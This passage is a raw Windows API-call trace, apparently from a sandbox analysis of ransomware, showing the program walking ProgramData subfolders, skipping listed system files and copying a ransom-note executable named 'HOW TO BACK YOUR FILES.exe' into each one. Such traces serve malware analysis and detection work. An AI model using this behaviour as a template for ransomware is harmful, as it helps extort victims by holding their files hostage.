nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.157] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.157] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.157] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.157] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.157] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c6cdfe0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.157] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.157] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Views", cAlternateFileName="")) returned 1 [0089.158] lstrcmpiW (lpString1="Views", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.158] lstrcmpiW (lpString1="Views", lpString2="aoldtz.exe") returned 1 [0089.158] lstrcmpiW (lpString1="Views", lpString2=".") returned 1 [0089.158] lstrcmpiW (lpString1="Views", lpString2="..") returned 1 [0089.158] lstrcmpiW (lpString1="Views", lpString2="windows") returned -1 [0089.158] lstrcmpiW (lpString1="Views", lpString2="bootmgr") returned 1 [0089.158] lstrcmpiW (lpString1="Views", lpString2="temp") returned 1 [0089.158] lstrcmpiW (lpString1="Views", lpString2="pagefile.sys") returned 1 [0089.158] lstrcmpiW (lpString1="Views", lpString2="boot") returned 1 [0089.158] lstrcmpiW (lpString1="Views", lpString2="ids.txt") returned 1 [0089.158] lstrcmpiW (lpString1="Views", lpString2="ntuser.dat") returned 1 [0089.158] lstrcmpiW (lpString1="Views", lpString2="perflogs") returned 1 [0089.158] lstrcmpiW (lpString1="Views", lpString2="MSBuild") returned 1 [0089.158] lstrlenW (lpString="Views") returned 5 [0089.158] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Event Viewer\\*") returned 43 [0089.158] lstrcpyW (in: lpString1=0x2cce454, lpString2="Views" | out: lpString1="Views") returned="Views" [0089.158] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0089.158] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f1fc8 [0089.158] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0089.158] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Views", cAlternateFileName="")) returned 0 [0089.158] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.158] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0089.158] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views") returned="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views" [0089.158] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0089.158] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0089.158] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views") returned 47 [0089.158] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views") returned="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views" [0089.158] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.158] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.159] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.159] GetLastError () returned 0x0 [0089.159] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.159] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.159] CloseHandle (hObject=0x120) returned 1 [0089.159] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.159] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.159] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.159] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.159] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.160] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.160] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.160] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.160] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.160] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.160] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.160] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ApplicationViewsRootNode", cAlternateFileName="APPLIC~1")) returned 1 [0089.160] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.160] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="aoldtz.exe") returned 1 [0089.160] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2=".") returned 1 [0089.160] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="..") returned 1 [0089.160] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="windows") returned -1 [0089.160] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="bootmgr") returned -1 [0089.160] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="temp") returned -1 [0089.160] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="pagefile.sys") returned -1 [0089.160] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="boot") returned -1 [0089.160] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="ids.txt") returned -1 [0089.160] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="ntuser.dat") returned -1 [0089.160] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="perflogs") returned -1 [0089.160] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="MSBuild") returned -1 [0089.160] lstrlenW (lpString="ApplicationViewsRootNode") returned 24 [0089.160] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*") returned 49 [0089.160] lstrcpyW (in: lpString1=0x2cce460, lpString2="ApplicationViewsRootNode" | out: lpString1="ApplicationViewsRootNode") returned="ApplicationViewsRootNode" [0089.160] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0089.160] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x92) returned 0x334fc8 [0089.160] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0089.160] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c6cdfe0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.160] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.160] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c6cdfe0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.160] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.160] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0089.160] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode" [0089.160] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0089.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0089.161] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned 72 [0089.161] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode" [0089.161] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.161] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\applicationviewsrootnode\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.161] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.161] GetLastError () returned 0x0 [0089.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.161] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.161] CloseHandle (hObject=0x120) returned 1 [0089.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.162] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.162] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.162] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.162] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.162] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.162] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.162] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.162] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.162] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.162] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.162] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c6cdfe0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.162] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.162] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c6cdfe0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.162] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.162] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0089.162] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\eHome", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\eHome") returned="C:\\Users\\All Users\\Microsoft\\eHome" [0089.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee7e0 | out: hHeap=0x2b0000) returned 1 [0089.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0089.162] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\eHome") returned 34 [0089.162] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\eHome" | out: lpString1="C:\\Users\\All Users\\Microsoft\\eHome") returned="C:\\Users\\All Users\\Microsoft\\eHome" [0089.162] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.162] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\eHome\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\ehome\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.163] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.163] GetLastError () returned 0x0 [0089.163] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.163] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.163] CloseHandle (hObject=0x120) returned 1 [0089.163] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.163] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.163] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\eHome\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4c6f4140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6f4140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.163] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.163] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.164] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.164] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4c6f4140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6f4140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.164] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.164] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.164] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.164] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.164] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c6f4140, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c6f4140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.164] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.164] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 1 [0089.164] lstrcmpiW (lpString1="logs", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.164] lstrcmpiW (lpString1="logs", lpString2="aoldtz.exe") returned 1 [0089.164] lstrcmpiW (lpString1="logs", lpString2=".") returned 1 [0089.164] lstrcmpiW (lpString1="logs", lpString2="..") returned 1 [0089.164] lstrcmpiW (lpString1="logs", lpString2="windows") returned -1 [0089.164] lstrcmpiW (lpString1="logs", lpString2="bootmgr") returned 1 [0089.164] lstrcmpiW (lpString1="logs", lpString2="temp") returned -1 [0089.164] lstrcmpiW (lpString1="logs", lpString2="pagefile.sys") returned -1 [0089.164] lstrcmpiW (lpString1="logs", lpString2="boot") returned 1 [0089.164] lstrcmpiW (lpString1="logs", lpString2="ids.txt") returned 1 [0089.164] lstrcmpiW (lpString1="logs", lpString2="ntuser.dat") returned -1 [0089.164] lstrcmpiW (lpString1="logs", lpString2="perflogs") returned -1 [0089.164] lstrcmpiW (lpString1="logs", lpString2="MSBuild") returned -1 [0089.164] lstrlenW (lpString="logs") returned 4 [0089.164] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\eHome\\*") returned 36 [0089.164] lstrcpyW (in: lpString1=0x2cce446, lpString2="logs" | out: lpString1="logs") returned="logs" [0089.164] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0089.164] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x50) returned 0x2ed8a0 [0089.164] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0089.164] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 0 [0089.164] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.164] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0089.164] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\eHome\\logs", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\eHome\\logs") returned="C:\\Users\\All Users\\Microsoft\\eHome\\logs" [0089.165] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8a0 | out: hHeap=0x2b0000) returned 1 [0089.165] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0089.165] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\eHome\\logs") returned 39 [0089.165] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\eHome\\logs" | out: lpString1="C:\\Users\\All Users\\Microsoft\\eHome\\logs") returned="C:\\Users\\All Users\\Microsoft\\eHome\\logs" [0089.165] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.165] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all 